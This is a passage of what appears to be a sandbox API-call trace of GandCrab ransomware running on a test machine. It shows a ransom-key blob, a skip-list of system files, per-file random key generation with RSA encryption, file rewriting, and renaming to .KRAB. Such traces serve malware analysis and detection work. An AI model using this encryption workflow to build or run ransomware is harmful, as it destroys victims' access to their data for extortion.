vMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.961] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.961] CloseHandle (hObject=0x440) returned 1 [0060.962] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.962] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.962] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x8, wMilliseconds=0xa5)) [0060.962] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.963] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.963] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.963] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a08d2ca4dee3d.lock") returned 85 [0060.963] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0060.963] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.964] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.964] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 62 [0060.964] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" [0060.964] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd7a0 [0060.964] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.964] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.964] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.964] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.964] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.964] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.964] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.964] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a08d2ca4dee3d.lock" [0060.964] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.964] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 90 [0060.964] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a08d2ca4dee3d.lock") returned 85 [0060.964] lstrlenW (lpString=".lock") returned 5 [0060.964] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.965] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.965] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.965] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.965] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0060.965] lstrcmpW (lpString1="Database1.LNK", lpString2=".") returned 1 [0060.965] lstrcmpW (lpString1="Database1.LNK", lpString2="..") returned 1 [0060.965] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="Database1.LNK" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK" [0060.965] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.966] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK.KRAB") returned 80 [0060.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK") returned 75 [0060.966] lstrlenW (lpString=".LNK") returned 4 [0060.966] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.966] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".LNK ") returned 5 [0060.966] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK") returned 75 [0060.966] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK") returned 75 [0060.966] lstrcmpiW (lpString1="Database1.LNK", lpString2="desktop.ini") returned -1 [0060.966] lstrcmpiW (lpString1="Database1.LNK", lpString2="autorun.inf") returned 1 [0060.966] lstrcmpiW (lpString1="Database1.LNK", lpString2="ntuser.dat") returned -1 [0060.966] lstrcmpiW (lpString1="Database1.LNK", lpString2="iconcache.db") returned -1 [0060.966] lstrcmpiW (lpString1="Database1.LNK", lpString2="bootsect.bak") returned 1 [0060.966] lstrcmpiW (lpString1="Database1.LNK", lpString2="boot.ini") returned 1 [0060.966] lstrcmpiW (lpString1="Database1.LNK", lpString2="ntuser.dat.log") returned -1 [0060.966] lstrcmpiW (lpString1="Database1.LNK", lpString2="thumbs.db") returned -1 [0060.966] lstrcmpiW (lpString1="Database1.LNK", lpString2="KRAB-DECRYPT.html") returned -1 [0060.966] lstrcmpiW (lpString1="Database1.LNK", lpString2="KRAB-DECRYPT.txt") returned -1 [0060.966] lstrcmpiW (lpString1="Database1.LNK", lpString2="CRAB-DECRYPT.txt") returned 1 [0060.966] lstrcmpiW (lpString1="Database1.LNK", lpString2="ntldr") returned -1 [0060.967] lstrcmpiW (lpString1="Database1.LNK", lpString2="NTDETECT.COM") returned -1 [0060.967] lstrcmpiW (lpString1="Database1.LNK", lpString2="Bootfont.bin") returned 1 [0060.967] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.967] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbbaa0) returned 1 [0060.967] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0060.968] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0060.968] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0060.968] CryptGenRandom (in: hProv=0xfbbaa0, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0060.968] CryptReleaseContext (hProv=0xfbbaa0, dwFlags=0x0) returned 1 [0060.968] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.968] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbbaa0) returned 1 [0060.968] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0060.972] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0060.972] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0060.972] CryptGenRandom (in: hProv=0xfbbaa0, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0060.973] CryptReleaseContext (hProv=0xfbbaa0, dwFlags=0x0) returned 1 [0060.973] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.973] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbb28) returned 1 [0060.974] CryptImportKey (in: hProv=0xfbbb28, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd4a0) returned 1 [0060.974] CryptGetKeyParam (in: hKey=0xfbd4a0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0060.974] CryptEncrypt (in: hKey=0xfbd4a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0060.975] GetLastError () returned 0x0 [0060.975] CryptDestroyKey (hKey=0xfbd4a0) returned 1 [0060.975] CryptReleaseContext (hProv=0xfbbb28, dwFlags=0x0) returned 1 [0060.975] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb5d8) returned 1 [0060.975] CryptImportKey (in: hProv=0xfbb5d8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd320) returned 1 [0060.975] CryptGetKeyParam (in: hKey=0xfbd320, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0060.975] CryptEncrypt (in: hKey=0xfbd320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0060.975] GetLastError () returned 0x0 [0060.975] CryptDestroyKey (hKey=0xfbd320) returned 1 [0060.975] CryptReleaseContext (hProv=0xfbb5d8, dwFlags=0x0) returned 1 [0060.976] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\database1.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0060.977] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0060.977] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0060.977] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x45b, lpOverlapped=0x0) returned 1 [0061.006] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffffba5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.006] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x45b, lpOverlapped=0x0) returned 1 [0061.006] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0061.007] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.012] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.013] CloseHandle (hObject=0x448) returned 1 [0061.017] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.018] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\database1.lnk"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\database1.lnk.krab")) returned 1 [0061.018] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.019] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.019] lstrcmpW (lpString1="Documents.LNK", lpString2=".") returned 1 [0061.019] lstrcmpW (lpString1="Documents.LNK", lpString2="..") returned 1 [0061.019] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="Documents.LNK" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK" [0061.019] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.019] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK.KRAB") returned 80 [0061.019] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK") returned 75 [0061.019] lstrlenW (lpString=".LNK") returned 4 [0061.019] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.019] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".LNK ") returned 5 [0061.019] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.020] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK") returned 75 [0061.020] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK") returned 75 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="desktop.ini") returned 1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="autorun.inf") returned 1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="ntuser.dat") returned -1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="iconcache.db") returned -1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="bootsect.bak") returned 1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="boot.ini") returned 1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="ntuser.dat.log") returned -1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="thumbs.db") returned -1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="KRAB-DECRYPT.html") returned -1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="KRAB-DECRYPT.txt") returned -1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="CRAB-DECRYPT.txt") returned 1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="ntldr") returned -1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="NTDETECT.COM") returned -1 [0061.020] lstrcmpiW (lpString1="Documents.LNK", lpString2="Bootfont.bin") returned 1 [0061.020] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.020] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbb770) returned 1 [0061.021] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0061.021] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.022] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.022] CryptGenRandom (in: hProv=0xfbb770, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0061.022] CryptReleaseContext (hProv=0xfbb770, dwFlags=0x0) returned 1 [0061.022] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.022] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbbff0) returned 1 [0061.022] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0061.023] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.023] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.023] CryptGenRandom (in: hProv=0xfbbff0, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0061.023] CryptReleaseContext (hProv=0xfbbff0, dwFlags=0x0) returned 1 [0061.023] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.023] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbbee0) returned 1 [0061.024] CryptImportKey (in: hProv=0xfbbee0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd820) returned 1 [0061.024] CryptGetKeyParam (in: hKey=0xfbd820, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.024] CryptEncrypt (in: hKey=0xfbd820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.024] GetLastError () returned 0x0 [0061.024] CryptDestroyKey (hKey=0xfbd820) returned 1 [0061.024] CryptReleaseContext (hProv=0xfbbee0, dwFlags=0x0) returned 1 [0061.024] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbb550) returned 1 [0061.024] CryptImportKey (in: hProv=0xfbb550, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd820) returned 1 [0061.024] CryptGetKeyParam (in: hKey=0xfbd820, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.025] CryptEncrypt (in: hKey=0xfbd820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.025] GetLastError () returned 0x0 [0061.025] CryptDestroyKey (hKey=0xfbd820) returned 1 [0061.025] CryptReleaseContext (hProv=0xfbb550, dwFlags=0x0) returned 1 [0061.025] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\documents.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0061.025] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.026] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.026] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x3bf, lpOverlapped=0x0) returned 1 [0061.125] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffffc41, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.125] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x3bf, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x3bf, lpOverlapped=0x0) returned 1 [0061.126] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0061.126] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.131] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.132] CloseHandle (hObject=0x448) returned 1 [0061.132] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.133] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\documents.lnk"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\documents.lnk.krab")) returned 1 [0061.134] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.134] FindNextFileW (in: 